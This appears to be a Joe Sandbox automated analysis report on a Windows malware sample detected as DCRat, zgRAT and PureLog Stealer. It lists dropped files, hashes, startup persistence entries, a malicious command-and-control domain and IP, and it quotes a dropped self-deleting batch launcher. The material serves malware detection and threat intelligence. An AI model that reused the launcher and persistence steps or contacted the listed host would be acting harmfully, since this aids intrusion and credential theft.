                                    C:\Users\user\Desktop\IuBreppm.log | 100% | Avira | HEUR/AGEN.1300079 |
                                    C:\Users\user\Desktop\OwCQqHNY.log | 100% | Avira | HEUR/AGEN.1300079 |
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\TLuxYJBs.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\ILIJsLjp.log | 100% | Joe Sandbox ML | |
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\JrdzzpEh.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\GcNqxydU.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\BOUJPwoA.log | 100% | Joe Sandbox ML | |
                                    C:\ProviderWebSavesNet\hostcrt.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\BpvsVBNg.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\RIIODaxx.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\FxsAqTHc.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\OwCQqHNY.log | 100% | Joe Sandbox ML | |
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | 100% | Joe Sandbox ML | |
                                    C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | 100% | Joe Sandbox ML | |
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://304550cm.n9shka.top | 100% | Avira URL Cloud | malware
http://304550cm.n9shka.top/ | 100% | Avira URL Cloud | malware
http://304550cm.n9shka.top/jspollgamesqldle.php | 100% | Avira URL Cloud | malware
http://304550cm.n9P: | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
304550cm.n9shka.top | 80.211.144.156 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://304550cm.n9shka.top/jspollgamesqldle.php | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://304550cm.n9shka.top | COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://304550cm.n9shka.top/ | COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000002F22000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hostcrt.exe, 00000004.00000002.1793730163.0000000003108000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003071000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://304550cm.n9P: | COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
80.211.144.156 | 304550cm.n9shka.top | Italy | 31034 | ARUBA-ASNIT | true
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1507297
                                      Start date and time:2024-09-08 11:50:50 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:19
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:kIdT4m0aa4.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:55A2312D6062E5BAC6C5F62A0EE42FA2.exe
                                      Detection:MAL
                                      Classification:mal100.troj.adwa.evad.winEXE@20/72@1/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target services.exe, PID 4588 because it is empty
                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: kIdT4m0aa4.exe
Time | Type | Description
05:52:04 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified
05:52:08 | API Interceptor | 12393852x Sleep call for process: COBPewMCbcSeQUSyEIOt.exe modified
10:51:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c5b4cb5e9653cc
10:52:03 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
Match: 80.211.144.156
Associated Sample Name / URL | Detection | Threat Name | Context
7buiOqC9uM.exe | malicious | DCRat | 545735cm.n9shteam2.top/PhpgeoupdateprocessorsqlTemporary.php
5R28W1PAnS.exe | malicious | DCRat, PureLog Stealer, zgRAT | 917166cm.n9shka.top/eternalJavascriptSecureCpuBigloadserverDefaultlinuxwordpress.php
YhyZwI1Upd.exe | malicious | DCRat, PureLog Stealer, zgRAT | gugol.top/PipeCpuauthgameDefault.php
6KZExx4zr6.exe | malicious | DCRat, PureLog Stealer, zgRAT | moscowteslaclub.top/LinemultiLinux.php
U22myB552e.exe | malicious | DCRat, PureLog Stealer, zgRAT | 692143cm.n9shka.top/VideoPythonphpsecureprocessorwindowsDleTemporary.php
active key.exe | malicious | DCRat, PureLog Stealer, zgRAT | 128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php
iwtYgAXvKB.exe | malicious | DCRat, PureLog Stealer, zgRAT | 951499cm.nyashtech.top/sqlcentralUploads.php
cuAvoExY41.exe | malicious | DCRat, PureLog Stealer, zgRAT | hvatit.top/dbwp.php
rRNxo8cmA3.exe | malicious | DCRat, PureLog Stealer, zgRAT | 222725cm.n9shka.top/vmjavascriptUpdateprotectlinuxWppublicTemp.php
9i0GfIAfU7.exe | malicious | DCRat, PureLog Stealer, zgRAT | 334972cm.n9shka.top/PhpPacketlowProcessGameprotectprivatecentral.php
                                      No context
Match: ARUBA-ASNIT
Associated Sample Name / URL | Detection | Threat Name | Context
7buiOqC9uM.exe | malicious | DCRat | 80.211.144.156
https://www.nexelsrl.it/wp-admin/js/GMX-00004/ | malicious | Unknown | 31.11.35.137
https://www.collomici.it/Orcia.html | malicious | Unknown | 31.11.35.172
5R28W1PAnS.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
YhyZwI1Upd.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
firmware.sh4.elf | malicious | Unknown | 80.88.85.16
SecuriteInfo.com.Script.SNH-gen.5224.29912.exe | malicious | FormBook | 62.149.128.45
6KZExx4zr6.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
avanss.exe | malicious | AgentTesla | 62.149.156.218
FATT. N. 2563 DEL 30.08.2024 Antincendi Marche S.r.l..exe | malicious | AgentTesla | 62.149.128.218
                                      No context
Match: C:\Users\user\Desktop\AfbbeRiC.log
Associated Sample Name / URL | Detection | Threat Name
5R28W1PAnS.exe | malicious | DCRat, PureLog Stealer, zgRAT
iqA8j9yGcd.exe | malicious | HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT
TwfUz3FuO7.exe | malicious | DCRat, PureLog Stealer, zgRAT
z3yAH0LL5e.exe | malicious | DCRat, PureLog Stealer, zgRAT
BUKHuBek8M.exe | malicious | DCRat, PureLog Stealer, zgRAT
Componentsession.exe | malicious | DCRat, PureLog Stealer, zgRAT
-#U00bc).exe | malicious | DCRat, PureLog Stealer, zgRAT
Loader.exe | malicious | DCRat, PureLog Stealer, zgRAT
SpotifyStartupTask2.exe | malicious | DCRat, PureLog Stealer, zgRAT
R6ZdHnUZee.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with very long lines (308), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):308
                                                          Entropy (8bit):5.785984719734551
                                                          Encrypted:false
                                                          SSDEEP:6:n7qqcJArfstqaNtKW5J9w+K01jehj1c+OOldo1TMKYSxE5ZgNvmaQLVsX/:nO8fiNtH79401jevWO3o1TaS25gma9P
                                                          MD5:4E5BB8BF4570A280F07A2BFB9EE07D98
                                                          SHA1:9616CB7554ACBD50F91988068A0EF5BD768E4FF1
                                                          SHA-256:F9C52FE1905182E2DAAF1DFC5C1F8C3212740EAEA712B8EE366D13C5CAAE8EDA
                                                          SHA-512:131D998712F7C223FC86F58F07F87A076F755359EDB162A9599F56F863B5FC284126A28E4F3998271D26F81FF91E87F0998FA6A8B0572EEA76FB655C8B17D01B
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):82
                                                          Entropy (8bit):5.218721785285712
                                                          Encrypted:false
                                                          SSDEEP:3:/DsvAJHyTXV4TXIlyrWUsNKht+rIdYsAn:gvAtiTlyrWUsKwId3A
                                                          MD5:22B3050E40CCED02D2A2149A4FF4C740
                                                          SHA1:BBF5353903FECF327FEFED64EA5682AA62AE6D3B
                                                          SHA-256:279A77EFF83AEAD5BC84AE074B51E9D31B582822E581AD09B96901C52C8FAD5C
                                                          SHA-512:3D2CA66D370E10BC13DBCC84145CC11BD524853FFC9E493BE7AC26A0DCFB7253DD76DEF55CA3DE2B4C493BE412287F49DA9AA074CD3CC13C072E2D7F0DDAC59C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:%LGfKiTOKd%%YUwkBls%..%SnFpq%"C:\ProviderWebSavesNet/hostcrt.exe"%mpVsRNBRVqxszbi%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Process:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):257
                                                          Entropy (8bit):5.968078709504006
                                                          Encrypted:false
                                                          SSDEEP:6:GHwqK+NkLzWbHK/818nZNDd3RL1wQJRWyO6y/+lOIh4Ptdz/t7:GuMCzWLKG4d3XBJ26yuOblh9
                                                          MD5:2DA89FB4C9E3DBDB93495A409F2C4174
                                                          SHA1:D22186A88E8EBE609DAD2EC8F0BB39DF314114C7
                                                          SHA-256:4E65E9DF887312CFBF2CAFC4A309ECA1DC4204F2F87B9A6ED20D37EB94F15C9A
                                                          SHA-512:5AA9F1D004C92C4B6FF7428CC24AAAEB5F04E668657904DD123DD1CA129C6B81C37D5EFA7AA746AEC52DB56417DA8038001EBF229EF5E2E61E12423B3B45B6B1
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):78
                                                          Entropy (8bit):5.288294045646641
                                                          Encrypted:false
                                                          SSDEEP:3:5hHqfdbo/WHZ0SOqqRt+1m:/K1boeaS2m1m
                                                          MD5:42734F088B6C99129DDD09A748286816
                                                          SHA1:ECEABD33147E36F3ED876B126834627A3686C35D
                                                          SHA-256:F68BFF17DF311B1F8FAB09B40A8A537A6C1EE629FF18C894C5CA973CDA853D09
                                                          SHA-512:3964F39B019B90AAF8DB926B9CFB6B5D6FABAFB2BCB3AE06947FDB2B5E574CED4B99AFFD16590DF340E1149F5D5F945CD6597A34CB8A3C9E8C1E2CE3703858BB
                                                          Malicious:false
                                                          Preview:4SIDwA28oGgzRU4hxq40RMcM3z39tguxoka3AEK4ZowaIXNUvnkpejwsz6K6H2PHWtLq3Agsf9anaC
                                                          Process:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):104
                                                          Entropy (8bit):5.2974262277734505
                                                          Encrypted:false
                                                          SSDEEP:3:Xj9i/nl6Xdpjj4WMcf/3KnLlbYkwZzr:zc8XjpX3KnJYkwNr
                                                          MD5:E22DFFA4DB79C8E952102D1FE8CA0F88
                                                          SHA1:7E943C65C06742D8BDA2827E35048E2373FE0EE3
                                                          SHA-256:5FE650F1DF04A710A465B16E3171CD13A61D03E44185C9C73C989C8903A15F5B
                                                          SHA-512:E3C18C72B1C0156369EE17F2EC67491E4E8860F706C4F1FD1EDD268A8A1DA7A45BC3B031164D55E6FBDBC3D1F80ABEC59FBF5EE81EC3A205DD8F6EA982CBDE11
                                                          Malicious:false
                                                          Preview:6ESFyrEE4NxgZoDZMhbvG2KeIISx2nVjpJLSaF2M6bxRM3Ow8oTEHb9E3x6pZRMR2N1Pcv8GpOzoE3SP4fyOTQcNKHYnJMwoPgY8B8TN
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):1698
                                                          Entropy (8bit):5.367720686892084
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                          MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                          SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                          SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                          SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):179
                                                          Entropy (8bit):5.2963226954334
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZjl+fmcRmnRgLtNSBktKcKZG1t+kiE2J5xAI0FPN:hCRLuVFOOr+DED+dRmn3KOZG1wkn23fA
                                                          MD5:23FE47B92A86BEDD61FC3E4BBAF2A300
                                                          SHA1:B26C530592DA0AC9C0AF567C9E75985A9A89AFB0
                                                          SHA-256:8EECBCF138D99E281F3842D215327E6F38F460E88B036FB041F0B232FB04169B
                                                          SHA-512:46093C6C6C48327D9BDF2AA566C4B65BB85049ACB9654FC8A0AADDD7CF8C98AAA08E0074E6E240ACC75DD283D239037DAFE02D564DB27B370BF2D37F60B11DAE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4sBxboqxXs.bat"
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.293660689688184
                                                          Encrypted:false
                                                          SSDEEP:3:L228Rp/iUupZ:C28P6UuX
                                                          MD5:B18736B8B09741644F9A321D6D35FD7E
                                                          SHA1:1778D7BAA74E5BD04A7E246F815EC36FB28CB8D8
                                                          SHA-256:C6EEFC182D8259CB42938A88BACA7E9F5B507489B67DA779C1EE0D8D43649E8B
                                                          SHA-512:26BB31CE2BC321D1B211B10CA176C1D2EB10F74BE74E554031D3DF906D53320054D44FA3BE1D5B9DBE0893C86D3231BECA21632DC1417CAA082F2C879AE7188E
                                                          Malicious:false
                                                          Preview:fUdA8SmnYtLZToFq7L0cuLtZB
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with very long lines (800), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):800
                                                          Entropy (8bit):5.882674247263806
                                                          Encrypted:false
                                                          SSDEEP:24:gbDiDFqExoWHRt7WjyqCiw6uzfDv5J5AMZNrSYLG:hDtoeRhUuz9JxrrSf
                                                          MD5:BF694B47DD23740370A5AF332385E3C7
                                                          SHA1:5FD7ED45AD5B154BB5B921CD94A8001B0460B40E
                                                          SHA-256:9645387FD451F984F20E368055B00DD5FB2CD7F7B6AD5C353259B3525B01D458
                                                          SHA-512:D98EE2AA6245BF8F04AB6384FFD6AF0DF561EEA48B9B903158B3998C5CE9AFB3003C875A883BC5A14BB49A82DFBDE022334D8A5A22E2D26D4AE4A549944FF63C
                                                          Malicious:false
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Joe Sandbox View:
                                                          • Filename: 5R28W1PAnS.exe, Detection: malicious, Browse
                                                          • Filename: iqA8j9yGcd.exe, Detection: malicious, Browse
                                                          • Filename: TwfUz3FuO7.exe, Detection: malicious, Browse
                                                          • Filename: z3yAH0LL5e.exe, Detection: malicious, Browse
                                                          • Filename: BUKHuBek8M.exe, Detection: malicious, Browse
                                                          • Filename: Componentsession.exe, Detection: malicious, Browse
                                                          • Filename: -#U00bc).exe, Detection: malicious, Browse
                                                          • Filename: Loader.exe, Detection: malicious, Browse
                                                          • Filename: SpotifyStartupTask2.exe, Detection: malicious, Browse
                                                          • Filename: R6ZdHnUZee.exe, Detection: malicious, Browse
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
